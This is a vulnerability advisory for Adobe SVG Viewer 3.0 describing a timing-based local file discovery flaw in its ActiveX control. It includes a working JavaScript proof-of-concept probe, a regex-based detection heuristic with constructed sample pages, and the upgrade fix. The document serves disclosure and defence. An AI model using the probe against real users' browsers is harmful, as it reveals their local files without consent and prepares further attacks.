Source:
www.adobe.com
Vulnerable Systems:
* Adobe SVG Viewer version 3.0
Immune Systems:
* Adobe SVG Viewer version 3.03
Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file NPSVG3.dll). The control has a property named 'src'. When 'src' is set to a file that exists, the web page stops loading immediately. If 'src' is set to a file that does not exist, the page continues to load (specifically, readyState does not reach the complete state). Using this trick, a little JavaScript can determine whether local files exist on a user's hard drive. Knowing that files exist can be a stepping stone for further attacks.
Proof of Concept:
function load(filename)
{
    // http://www.hyperdose.com/exploits/AdobeSVG.html
    // foo is a reference to the SVG ActiveX control; filename is the filename you're looking for
    foo.src = filename;
    // Check the page's load state after 5 seconds
    setTimeout("loading()", 5000);
}
function loading()
{
    // Page still loading: file not found. Page complete: file exists.
    if (document.readyState != 'complete')
    {
        alert('File does not exist.');
    }
    else
    {
        alert('File exists.');
    }
    // Reload so the page starts from a clean load state
    window.location.reload(false);
}
This bug is very similar to Hyperdose's last advisory, "Adobe ActiveX Allows Local File Discovery". The exploit mechanism for this one, though, is more interesting. Be aware of timing-based attacks. If you pay attention, they're out there.
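A detection-side view of the same pattern, as an added example that is not part of the original advisory: a heuristic that scans a page's inline script for a 'src' write combined with a timed readyState check. The function names, signal names and scoring are assumptions, and both sample pages are constructed.

```javascript
// Added example, not from the advisory. scanPage, its signal names and the
// scoring are hypothetical; tune them before using this for triage.

// String literal naming a local file: file:// URL, drive letter or UNC path.
const LOCAL_PATH = /["'](?:file:\/\/|[a-z]:[\\\/]|\\\\)[^"']*["']/i;

// Concatenate the bodies of all inline <script> elements.
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].map((m) => m[1]).join('\n');
}

function scanPage(html) {
  const js = inlineScripts(html);
  const signals = {
    // Script writes a 'src' property (the trigger described in the advisory).
    srcAssigned: /\.src\s*=(?!=)/.test(js),
    // Script compares readyState against 'complete'.
    readyStateCheck: /\breadyState\b\s*[!=]==?\s*["']complete["']/.test(js),
    // A timer delays the check until the load has had time to finish.
    timer: /\bset(?:Timeout|Interval)\s*\(/.test(js),
    // A reload resets the page so another filename can be tested.
    reload: /\blocation\s*\.\s*reload\s*\(/.test(js),
    // A local path literal appears in the script.
    localPath: LOCAL_PATH.test(js),
  };
  // Core pattern: src write plus timed readyState check; the rest add weight.
  const core = signals.srcAssigned && signals.readyStateCheck && signals.timer;
  const score = core ? 3 + Number(signals.reload) + Number(signals.localPath) : 0;
  return { suspicious: core, score, signals };
}

// Constructed sample pages (not captured traffic).
const SAMPLE_PROBE = `<html><body><script>
function load(f) { foo.src = f; setTimeout("loading()", 5000); }
function loading() {
  if (document.readyState != 'complete') { report(false); } else { report(true); }
  window.location.reload(false);
}
load("C:/example/placeholder.txt");
</script></body></html>`;

const SAMPLE_BENIGN = `<html><body><script>
var img = new Image(); img.src = "/logo.png";
if (document.readyState === 'complete') { init(); }
</script></body></html>`;

console.log(scanPage(SAMPLE_PROBE).score, scanPage(SAMPLE_BENIGN).score);
```

Legitimate pages can also combine these calls, so a hit is a reason to review the page, not a verdict.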
Solution:
Upgrade to version 3.03; details from Adobe can be found here:
http://www.adobe.com/svg/viewer/install/mainframed.html.